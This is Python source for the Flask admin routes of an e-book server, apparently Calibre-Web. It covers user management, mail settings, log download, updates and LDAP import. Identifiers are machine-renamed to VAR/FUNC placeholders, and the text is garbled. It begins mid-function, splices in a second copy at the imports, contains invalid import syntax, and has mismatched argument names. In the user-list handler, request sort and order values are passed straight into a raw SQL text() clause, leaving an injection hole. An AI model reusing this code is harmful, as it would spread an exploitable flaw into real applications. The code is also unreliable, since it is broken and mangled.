return redirect(url_for('admin.admin'))
if VAR_16.get("password"):
VAR_22.password = generate_password_hash(VAR_16["password"])
VAR_108 = VAR_22.is_anonymous
VAR_22.role = constants.selected_roles(VAR_16)
if VAR_108:
VAR_22.role |= constants.ROLE_ANONYMOUS
else:
VAR_22.role &= ~constants.ROLE_ANONYMOUS
VAR_109 = [VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_')]
VAR_110 = get_sidebar_config()
for VAR_10 in VAR_110:
VAR_125 = VAR_10['visibility']
if VAR_125 in VAR_109 and not VAR_22.check_visibility(VAR_125):
VAR_22.sidebar_view |= VAR_125
elif VAR_125 not in VAR_109 and VAR_22.check_visibility(VAR_125):
VAR_22.sidebar_view &= ~VAR_125
if VAR_16.get("Show_detail_random"):
VAR_22.sidebar_view |= constants.DETAIL_RANDOM
else:
VAR_22.sidebar_view &= ~constants.DETAIL_RANDOM
VAR_111 = VAR_22.kobo_only_shelves_sync
VAR_22.kobo_only_shelves_sync = VAR_119(VAR_16.get("kobo_only_shelves_sync") == "on") or 0
if VAR_111 == 0 and VAR_22.kobo_only_shelves_sync == 1:
kobo_sync_status.update_on_sync_shelfs(VAR_22.id)
if VAR_16.get("default_language"):
VAR_22.default_language = VAR_16["default_language"]
if VAR_16.get("locale"):
VAR_22.locale = VAR_16["locale"]
try:
if VAR_16.get("email", VAR_22.email) != VAR_22.email:
VAR_22.email = check_email(VAR_16["email"])
if VAR_16.get("name", VAR_22.name) != VAR_22.name:
if VAR_16.get("name") == "Guest":
raise Exception(_("Guest Name can't be changed"))
VAR_22.name = check_username(VAR_16["name"])
if VAR_16.get("kindle_mail") != VAR_22.kindle_mail:
VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"]) if VAR_16["kindle_mail"] else ""
except Exception as ex:
VAR_0.error(ex)
flash(str(ex), category="error")
return render_title_template("user_edit.html",
VAR_24=translations,
VAR_23=languages,
mail_configured=config.get_mail_server_configured(),
VAR_25=kobo_support,
FUNC_55=0,
VAR_22=content,
config=config,
registered_oauth=VAR_97,
title=_(u"Edit User %(nick)s", nick=VAR_22.name),
page="edituser")
try:
ub.session_commit()
flash(_(u"User '%(nick)s' updated", nick=VAR_22.name), category="success")
except IntegrityError as ex:
ub.session.rollback()
VAR_0.error("An unknown error occurred while changing VAR_12: {}".format(str(ex)))
flash(_(u"An unknown error occurred. Please try again later."), category="error")
except OperationalError:
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return ""
@VAR_2.route("/FUNC_4/VAR_12/new", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_55():
VAR_22 = ub.User()
VAR_23 = calibre_db.speaking_language()
VAR_24 = [LC('en')] + babel.list_translations()
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
if request.method == "POST":
VAR_16 = request.form.to_dict()
FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
else:
VAR_22.role = config.config_default_role
VAR_22.sidebar_view = config.config_default_show
VAR_22.locale = config.config_default_locale
VAR_22.default_language = config.config_default_language
return render_title_template("user_edit.html", FUNC_55=1, VAR_22=content,
config=config, VAR_24=translations,
VAR_23=languages, title=_(u"Add new user"), page="newuser",
VAR_25=kobo_support, registered_oauth=VAR_97)
@VAR_2.route("/FUNC_4/mailsettings")
@login_required
@FUNC_0
def FUNC_56():
VAR_22 = config.get_mail_settings()
return render_title_template("email_edit.html", VAR_22=content, title=_(u"Edit E-mail Server Settings"),
page="mailset", VAR_1=feature_support)
@VAR_2.route("/FUNC_4/mailsettings", methods=["POST"])
@login_required
@FUNC_0
def FUNC_57():
VAR_16 = request.form.to_dict()
FUNC_38(VAR_16, "mail_server_type")
if VAR_16.get("invalidate"):
config.mail_gmail_token = {}
try:
flag_modified(config, "mail_gmail_token")
except AttributeError:
pass
elif VAR_16.get("gmail"):
try:
config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
flash(_(u"Gmail Account Verification Successful"), category="success")
except Exception as ex:
flash(str(ex), category="error")
VAR_0.error(ex)
return FUNC_56()
else:
FUNC_41(VAR_16, "mail_server")
FUNC_38(VAR_16, "mail_port")
FUNC_38(VAR_16, "mail_use_ssl")
FUNC_41(VAR_16, "mail_login")
FUNC_41(VAR_16, "mail_password")
FUNC_41(VAR_16, "mail_from")
FUNC_38(VAR_16, "mail_size", lambda y: VAR_119(y)*1024*1024)
try:
config.save()
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return FUNC_56()
if VAR_16.get("test"):
if VAR_62.email:
VAR_126 = send_test_mail(VAR_62.email, VAR_62.name)
if VAR_126 is None:
flash(_(u"Test e-mail queued for sending to %(email)s, please VAR_66 Tasks for result",
email=VAR_62.email), category="info")
else:
flash(_(u"There was an error sending the Test e-mail: %(res)s", res=VAR_126), category="error")
else:
flash(_(u"Please configure your e-mail address first..."), category="error")
else:
flash(_(u"E-mail server settings updated"), category="success")
return FUNC_56()
@VAR_2.route("/FUNC_4/VAR_12/<VAR_119:VAR_9>", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_58(VAR_9):
VAR_22 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first() # type: ub.User
if not VAR_22 or (not config.config_anonbrowse and VAR_22.name == "Guest"):
flash(_(u"User not found"), category="error")
return redirect(url_for('admin.admin'))
VAR_23 = calibre_db.speaking_language(return_all_languages=True)
VAR_24 = babel.list_translations() + [LC('en')]
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
if request.method == "POST":
VAR_16 = request.form.to_dict()
VAR_86 = FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
if VAR_86:
return VAR_86
return render_title_template("user_edit.html",
VAR_24=translations,
VAR_23=languages,
FUNC_55=0,
VAR_22=content,
config=config,
registered_oauth=VAR_97,
mail_configured=config.get_mail_server_configured(),
VAR_25=kobo_support,
title=_(u"Edit User %(nick)s", nick=VAR_22.name),
page="edituser")
@VAR_2.route("/FUNC_4/resetpassword/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_59(VAR_9):
if VAR_62 is not None and VAR_62.is_authenticated:
VAR_59, VAR_71 = reset_password(VAR_9)
if VAR_59 == 1:
VAR_0.debug(u"Password for VAR_12 %s reset", VAR_71)
flash(_(u"Password for VAR_12 %(VAR_12)s reset", VAR_12=VAR_71), category="success")
elif VAR_59 == 0:
VAR_0.error(u"An unknown error occurred. Please try again later.")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
VAR_0.error(u"Please configure the SMTP mail settings first...")
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
return redirect(url_for('admin.admin'))
@VAR_2.route("/FUNC_4/logfile")
@login_required
@FUNC_0
def FUNC_60():
VAR_89 = {0: logger.get_logfile(config.config_logfile),
1: logger.get_accesslogfile(config.config_access_logfile)}
return render_title_template("logviewer.html",
title=_(u"Logfile viewer"),
accesslog_enable=config.config_access_log,
log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
VAR_89=logfiles,
page="logfile")
@VAR_2.route("/ajax/VAR_0/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_61(VAR_26):
if VAR_26 == 1:
VAR_112 = logger.get_accesslogfile(config.config_access_logfile)
return send_from_directory(os.path.dirname(VAR_112),
os.path.basename(VAR_112))
if VAR_26 == 0:
VAR_112 = logger.get_logfile(config.config_logfile)
return send_from_directory(os.path.dirname(VAR_112),
os.path.basename(VAR_112))
else:
return ""
@VAR_2.route("/FUNC_4/logdownload/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_62(VAR_26):
if VAR_26 == 0:
VAR_113 = logger.get_logfile(config.config_logfile)
elif VAR_26 == 1:
VAR_113 = logger.get_accesslogfile(config.config_access_logfile)
else:
abort(404)
if logger.is_valid_logfile(VAR_113):
return debug_info.assemble_logfiles(VAR_113)
abort(404)
@VAR_2.route("/FUNC_4/debug")
@login_required
@FUNC_0
def FUNC_63():
return debug_info.send_debug()
@VAR_2.route("/get_update_status", methods=['GET'])
@login_required
@FUNC_0
def FUNC_64():
if VAR_1['updater']:
VAR_0.info(u"Update VAR_90 requested")
return updater_thread.get_available_updates(request.method, VAR_58=get_locale())
else:
return ''
@VAR_2.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@FUNC_0
def FUNC_65():
VAR_90 = {}
if VAR_1['updater']:
if request.method == "POST":
VAR_98 = request.form.to_dict()
if "start" in VAR_98 and VAR_98['start'] == 'True':
VAR_130 = {
"1": _(u'Requesting update package'),
"2": _(u'Downloading update package'),
"3": _(u'Unzipping update package'),
"4": _(u'Replacing files'),
"5": _(u'Database connections are closed'),
"6": _(u'Stopping server'),
"7": _(u'Update finished, please press okay and reload page'),
"8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
"9": _(u'Update failed:') + u' ' + _(u'Connection error'),
"10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
"11": _(u'Update failed:') + u' ' + _(u'General error'),
"12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
"13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
}
VAR_90['text'] = VAR_130
updater_thread.status = 0
updater_thread.resume()
VAR_90['status'] = updater_thread.get_update_status()
elif request.method == "GET":
try:
VAR_90['status'] = updater_thread.get_update_status()
if VAR_90['status'] == -1:
VAR_90['status'] = 7
except Exception:
VAR_90['status'] = 11
return json.dumps(VAR_90)
return ''
def FUNC_66(VAR_12, VAR_27):
VAR_91 = FUNC_69(VAR_12, config.config_ldap_user_object)
try:
VAR_114 = VAR_27[VAR_91][0].decode('utf-8')
except KeyError as ex:
VAR_0.error("Failed to extract LDAP VAR_12: %s - %s", VAR_12, ex)
VAR_71 = _(u'Failed to extract at least One LDAP User')
return 0, VAR_71
if ub.session.query(ub.User).filter(VAR_18.lower(ub.User.name) == VAR_114.lower()).first():
VAR_0.warning("LDAP User %s Already in Database", VAR_27)
return 0, None
VAR_92 = ''
if 'mail' in VAR_27:
VAR_115 = VAR_27['mail'][0].decode('utf-8')
if len(VAR_27['mail']) > 1:
VAR_92 = VAR_27['mail'][1].decode('utf-8')
else:
VAR_0.debug('No Mail Field Found in LDAP Response')
VAR_115 = VAR_114 + '@email.com'
try:
VAR_115 = check_email(VAR_115)
except Exception as ex:
VAR_0.warning("LDAP Email Error: {}, {}".format(VAR_27, ex))
return 0, None
VAR_22 = ub.User()
VAR_22.name = VAR_114
VAR_22.password = '' # dummy password which will be replaced by ldap one
VAR_22.email = VAR_115
VAR_22.kindle_mail = VAR_92
VAR_22.default_language = config.config_default_language
VAR_22.locale = config.config_default_locale
VAR_22.role = config.config_default_role
VAR_22.sidebar_view = config.config_default_show
VAR_22.allowed_tags = config.config_allowed_tags
VAR_22.denied_tags = config.config_denied_tags
VAR_22.allowed_column_value = config.config_allowed_column_value
VAR_22.denied_column_value = config.config_denied_column_value
ub.session.add(VAR_22)
try:
ub.session.commit()
return 1, None # increase no of VAR_54
except Exception as ex:
VAR_0.warning("Failed to create LDAP VAR_12: %s - %s", VAR_12, ex)
ub.session.rollback()
VAR_71 = _(u'Failed to Create at Least One LDAP User')
return 0, VAR_71
@VAR_2.route('/import_ldap_users')
@login_required
@FUNC_0
def FUNC_67():
VAR_33 = {}
try:
VAR_116 = services.ldap.get_group_members(config.config_ldap_group_name)
except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
VAR_0.debug_or_exception(e)
VAR_33['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
return json.dumps(VAR_33)
if not VAR_116:
VAR_0.debug('LDAP empty response')
VAR_33['text'] = _(u'Error: No VAR_12 returned in VAR_52 of LDAP server')
return json.dumps(VAR_33)
VAR_93 = 0
for VAR_114 in VAR_116:
VAR_12 = VAR_114.decode('utf-8')
if '=' in VAR_12:
if config.config_ldap_member_user_object:
VAR_128 = config.config_ldap_member_user_object
else:
VAR_128 = config.config_ldap_user_object
try:
VAR_127 = FUNC_70(VAR_12, VAR_128)
except Exception as ex:
VAR_0.warning(ex)
continue
else:
VAR_127 = VAR_12
VAR_128 = None
try:
VAR_27 = services.ldap.get_object_details(VAR_12=VAR_127, VAR_128=query_filter)
except AttributeError as ex:
VAR_0.debug_or_exception(ex)
continue
if VAR_27:
VAR_129, VAR_71 = FUNC_66(VAR_12, VAR_27)
if VAR_71:
VAR_33['text'] = VAR_71
else:
VAR_93 += VAR_129
else:
VAR_0.warning("LDAP User: %s Not Found", VAR_12)
VAR_33['text'] = _(u'At Least One LDAP User Not Found in Database')
if not VAR_33:
showtext['text'] = _(u'{} User Successfully Imported'.format(VAR_93))
return json.dumps(VAR_33)
def FUNC_68(VAR_12, VAR_28):
VAR_94 = re.search(VAR_28 + r"=([\.\d\s\w-]+)", VAR_12, re.IGNORECASE | re.UNICODE)
if VAR_94:
return VAR_94.group(1)
else:
raise Exception("Could Not Parse LDAP User: {}".format(VAR_12))
def FUNC_69(VAR_12, VAR_29):
VAR_94 = re.search("([a-zA-Z0-9-]+)=%s", VAR_29, re.IGNORECASE | re.UNICODE)
if VAR_94:
return VAR_94.group(1)
else:
raise Exception("Could Not Parse LDAP Userfield: {}", VAR_12)
def FUNC_70(VAR_12, VAR_29):
VAR_95 = FUNC_69(VAR_12, VAR_29)
return FUNC_68(VAR_12, VAR_95)
|
import os
import re
import base64
import .json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import .format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import .login_required, VAR_62, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import .func, or_, VAR_130
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import .check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_0 = logger.create()
VAR_1 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
VAR_1['rar'] = True
except (ImportError, SyntaxError):
VAR_1['rar'] = False
try:
from .oauth_bb import .oauth_check, VAR_96
VAR_1['oauth'] = True
except ImportError as err:
VAR_0.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
VAR_1['oauth'] = False
VAR_96 = []
VAR_97 = {}
VAR_1['gdrive'] = gdrive_support
VAR_2 = Blueprint('admin', __name__)
def FUNC_0(VAR_3):
@wraps(VAR_3)
def FUNC_71(*VAR_30, **VAR_31):
if VAR_62.role_admin():
return VAR_3(*VAR_30, **VAR_31)
abort(403)
return FUNC_71
@VAR_2.before_app_request
def FUNC_1():
if VAR_62.is_authenticated:
confirm_login()
if not ub.check_user_session(VAR_62.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = VAR_62
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == VAR_62.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@VAR_2.route("/admin")
@login_required
def FUNC_2():
abort(403)
@VAR_2.route("/shutdown", methods=["POST"])
@login_required
@FUNC_0
def FUNC_3():
VAR_32 = request.get_json().get('parameter', -1)
VAR_33 = {}
if VAR_32 in (0, 1): # valid commandos received
calibre_db.dispose()
ub.dispose()
if VAR_32 == 0:
VAR_33['text'] = _(u'Server restarted, please reload page')
else:
VAR_33['text'] = _(u'Performing FUNC_3 of server, please close window')
web_server.stop(VAR_32 == 0)
return json.dumps(VAR_33)
if VAR_32 == 2:
VAR_0.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
VAR_33['text'] = _(u'Reconnect successful')
return json.dumps(VAR_33)
showtext['text'] = _(u'Unknown command')
return json.dumps(VAR_33), 400
@VAR_2.route("/FUNC_4/view")
@login_required
@FUNC_0
def FUNC_4():
VAR_34 = updater_thread.get_current_version_info()
if VAR_34 is False:
VAR_98 = _(u'Unknown')
else:
if 'datetime' in VAR_34:
VAR_98 = VAR_34['datetime']
VAR_117 = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
VAR_118 = datetime.strptime(VAR_98[:19], "%Y-%m-%dT%H:%M:%S")
if len(VAR_98) > 19: # VAR_66 if string has timezone
if VAR_98[19] == '+':
VAR_118 -= timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
elif VAR_98[19] == '-':
VAR_118 += timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
VAR_98 = format_datetime(VAR_118 - VAR_117, format='short', VAR_58=get_locale())
else:
VAR_98 = VAR_34['version']
VAR_35 = ub.session.query(ub.User).all()
VAR_36 = config.get_mail_settings()
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", VAR_35=allUser, email=VAR_36, config=config, VAR_98=commit,
VAR_1=feature_support, VAR_25=kobo_support,
title=_(u"Admin page"), page="admin")
@VAR_2.route("/FUNC_4/dbconfig", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_5():
if request.method == "POST":
return FUNC_48()
return FUNC_51()
@VAR_2.route("/FUNC_4/config", methods=["GET"])
@login_required
@FUNC_0
def FUNC_6():
return render_title_template("config_edit.html",
config=config,
provider=VAR_96,
VAR_1=feature_support,
title=_(u"Basic Configuration"), page="config")
@VAR_2.route("/FUNC_4/ajaxconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_7():
return FUNC_49()
@VAR_2.route("/FUNC_4/ajaxdbconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_8():
return FUNC_48()
@VAR_2.route("/FUNC_4/alive", methods=["GET"])
@login_required
@FUNC_0
def FUNC_9():
return "", 200
@VAR_2.route("/FUNC_4/viewconfig")
@login_required
@FUNC_0
def FUNC_10():
VAR_37 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_38 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_23 = calibre_db.speaking_language()
VAR_24 = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=VAR_37,
restrictColumns=VAR_38,
VAR_23=languages,
VAR_24=translations,
title=_(u"UI Configuration"), page="uiconfig")
@VAR_2.route("/FUNC_4/usertable")
@login_required
@FUNC_0
def FUNC_11():
VAR_39 = VAR_62.view_settings.get('useredit', {})
VAR_23 = calibre_db.speaking_language()
VAR_24 = babel.list_translations() + [LC('en')]
VAR_35 = ub.session.query(ub.User)
VAR_40 = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(VAR_130('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
VAR_99 = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
VAR_99 = []
if not config.config_anonbrowse:
VAR_35 = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
VAR_54=VAR_35.all(),
VAR_40=tags,
VAR_99=custom_values,
VAR_24=translations,
VAR_23=languages,
visiblility=VAR_39,
all_roles=constants.ALL_ROLES,
VAR_25=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@VAR_2.route("/ajax/listusers")
@login_required
@FUNC_0
def FUNC_12():
VAR_41 = VAR_119(request.args.get("offset") or 0)
VAR_42 = VAR_119(request.args.get("limit") or 10)
VAR_43 = request.args.get("search")
VAR_44 = request.args.get("sort", "id")
VAR_45 = request.args.get("order", "").lower()
VAR_46 = None
if VAR_44 == "state":
VAR_46 = json.loads(request.args.get("state", "[]"))
if VAR_44 != "state" and VAR_45:
VAR_45 = VAR_130(VAR_44 + " " + VAR_45)
elif not VAR_46:
VAR_45 = ub.User.id.asc()
VAR_47 = ub.session.query(ub.User)
if not config.config_anonbrowse:
VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_48 = VAR_49 = VAR_47.count()
if VAR_43:
VAR_47 = VAR_47.filter(or_(VAR_18.lower(ub.User.name).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.kindle_mail).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.email).ilike("%" + VAR_43 + "%")))
if VAR_46:
VAR_54 = calibre_db.get_checkbox_sorted(VAR_47.all(), VAR_46, VAR_41, VAR_42, request.args.get("order", "").lower())
else:
VAR_54 = VAR_47.order_by(VAR_45).offset(VAR_41).limit(VAR_42).all()
if VAR_43:
VAR_49 = len(VAR_54)
for VAR_12 in VAR_54:
if VAR_12.default_language == "all":
VAR_12.default = _("All")
else:
VAR_12.default = LC.parse(VAR_12.default_language).get_language_name(get_locale())
VAR_50 = {'totalNotFiltered': VAR_48, 'total': VAR_49, "rows": VAR_54}
VAR_51 = json.dumps(VAR_50, cls=db.AlchemyEncoder)
VAR_52 = make_response(VAR_51)
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/deleteuser", methods=['POST'])
@login_required
@FUNC_0
def FUNC_13():
VAR_53 = request.form.to_dict(flat=False)
VAR_54 = None
if "userid[]" in VAR_53:
VAR_54 = ub.session.query(ub.User).filter(ub.User.id.in_(VAR_53['userid[]'])).all()
elif "userid" in VAR_53:
VAR_54 = ub.session.query(ub.User).filter(ub.User.id == VAR_53['userid'][0]).all()
VAR_55 = 0
VAR_56 = list()
VAR_57 = list()
if not VAR_54:
VAR_0.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for VAR_12 in VAR_54:
try:
VAR_71 = FUNC_53(VAR_12)
VAR_55 += 1
except Exception as ex:
VAR_0.error(ex)
VAR_56.append({'type': "danger", 'message': str(ex)})
if VAR_55 == 1:
VAR_0.info("User {} deleted".format(VAR_53))
VAR_57 = [{'type': "success", 'message': VAR_71}]
elif VAR_55 > 1:
VAR_0.info("Users {} deleted".format(VAR_53))
VAR_57 = [{'type': "success", 'message': _("{} VAR_54 deleted successfully").format(VAR_55)}]
VAR_57.extend(VAR_56)
return Response(json.dumps(VAR_57), mimetype='application/json')
@VAR_2.route("/ajax/getlocale")
@login_required
@FUNC_0
def FUNC_14():
VAR_58 = babel.list_translations() + [LC('en')]
VAR_59 = list()
VAR_60 = get_locale()
for loc in VAR_58:
VAR_59.append({'value': str(loc), 'text': loc.get_language_name(VAR_60)})
return json.dumps(VAR_59)
@VAR_2.route("/ajax/getdefaultlanguage")
@login_required
@FUNC_0
def FUNC_15():
VAR_23 = calibre_db.speaking_language()
VAR_59 = list()
VAR_59.append({'value': 'all', 'text': _('Show All')})
for lang in VAR_23:
VAR_59.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(VAR_59)
@VAR_2.route("/ajax/editlistusers/<VAR_4>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_16(VAR_4):
VAR_61 = request.form.to_dict(flat=False)
VAR_47 = ub.session.query(ub.User)
if not config.config_anonbrowse:
VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
if "pk" in VAR_61:
VAR_54 = [VAR_47.filter(ub.User.id == VAR_61['pk'][0]).one_or_none()]
else:
if "pk[]" in VAR_61:
VAR_54 = VAR_47.filter(ub.User.id.in_(VAR_61['pk[]'])).all()
else:
return _("Malformed request"), 400
if 'field_index' in VAR_61:
VAR_61['field_index'] = VAR_61['field_index'][0]
if 'value' in VAR_61:
VAR_61['value'] = VAR_61['value'][0]
elif not ('value[]' in VAR_61):
return _("Malformed request"), 400
for VAR_12 in VAR_54:
try:
if VAR_4 in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
if 'value[]' in VAR_61:
setattr(VAR_12, VAR_4, FUNC_29(VAR_12, VAR_61['action'][0], VAR_4, VAR_61['value[]']))
else:
setattr(VAR_12, VAR_4, VAR_61['value'].strip())
else:
VAR_61['value'] = VAR_61['value'].strip()
if VAR_4 == 'name':
if VAR_12.name == "Guest":
raise Exception(_("Guest Name can't be changed"))
VAR_12.name = check_username(VAR_61['value'])
elif VAR_4 =='email':
VAR_12.email = check_email(VAR_61['value'])
elif VAR_4 =='kobo_only_shelves_sync':
VAR_12.kobo_only_shelves_sync = VAR_119(VAR_61['value'] == 'true')
elif VAR_4 == 'kindle_mail':
VAR_12.kindle_mail = valid_email(VAR_61['value']) if VAR_61['value'] else ""
elif VAR_4.endswith('role'):
VAR_125 = VAR_119(VAR_61['field_index'])
if VAR_12.name == "Guest" and VAR_125 in \
[constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
raise Exception(_("Guest can't have this role"))
if VAR_125 > 0 and VAR_125 <= constants.ROLE_VIEWER and (VAR_125 & value-1 == 0 or VAR_125 == 1):
if VAR_61['value'] == 'true':
VAR_12.role |= VAR_125
elif VAR_61['value'] == 'false':
if VAR_125 == constants.ROLE_ADMIN:
if not ub.session.query(ub.User).\
filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_12.id).count():
return Response(
json.dumps([{'type': "danger",
'message':_(u"No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role",
nick=VAR_12.name)}]), mimetype='application/json')
VAR_12.role &= ~VAR_125
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid role"))
elif VAR_4.startswith('sidebar'):
VAR_125 = VAR_119(VAR_61['field_index'])
if VAR_12.name == "Guest" and VAR_125 == constants.SIDEBAR_READ_AND_UNREAD:
raise Exception(_("Guest can't have this view"))
if VAR_125 > 0 and VAR_125 <= constants.SIDEBAR_LIST and (VAR_125 & value-1 == 0 or VAR_125 == 1):
if VAR_61['value'] == 'true':
VAR_12.sidebar_view |= VAR_125
elif VAR_61['value'] == 'false':
VAR_12.sidebar_view &= ~VAR_125
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid view"))
elif VAR_4 == 'locale':
if VAR_12.name == "Guest":
raise Exception(_("Guest's Locale is determined automatically and can't be set"))
if VAR_61['value'] in _BABEL_TRANSLATIONS:
VAR_12.locale = VAR_61['value']
else:
raise Exception(_("No Valid Locale Given"))
elif VAR_4 == 'default_language':
VAR_23 = calibre_db.session.query(db.Languages) \
.join(db.books_languages_link) \
.join(db.Books) \
.filter(calibre_db.common_filters()) \
.group_by(VAR_130('books_languages_link.lang_code')).all()
VAR_131 = [lang.lang_code for lang in VAR_23] + ["all"]
if VAR_61['value'] in VAR_131:
VAR_12.default_language = VAR_61['value']
else:
raise Exception(_("No Valid Book Language Given"))
else:
return _("Parameter not found"), 400
except Exception as ex:
VAR_0.debug_or_exception(ex)
return str(ex), 400
ub.session_commit()
return ""
@VAR_2.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@FUNC_0
def FUNC_17():
VAR_62.view_settings['useredit'] = json.loads(request.data)
try:
try:
flag_modified(VAR_62, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
VAR_0.error("Invalid request received: {}".format(request))
return "Invalid request", 400
return ""
def FUNC_18(VAR_5):
if VAR_5 != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == VAR_5) \
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
def FUNC_19(VAR_5):
if VAR_5 != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == VAR_5) \
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
@VAR_2.route("/FUNC_4/viewconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_20():
VAR_16 = request.form.to_dict()
FUNC_41(VAR_16, "config_calibre_web_title")
FUNC_41(VAR_16, "config_columns_to_ignore")
if FUNC_41(VAR_16, "config_title_regex"):
calibre_db.update_title_sort(config)
if not FUNC_18(VAR_16.get("config_read_column", "0")):
flash(_(u"Invalid Read Column"), category="error")
VAR_0.debug("Invalid Read column")
return FUNC_10()
FUNC_38(VAR_16, "config_read_column")
if not FUNC_19(VAR_16.get("config_restricted_column", "0")):
flash(_(u"Invalid Restricted Column"), category="error")
VAR_0.debug("Invalid Restricted Column")
return FUNC_10()
FUNC_38(VAR_16, "config_restricted_column")
FUNC_38(VAR_16, "config_theme")
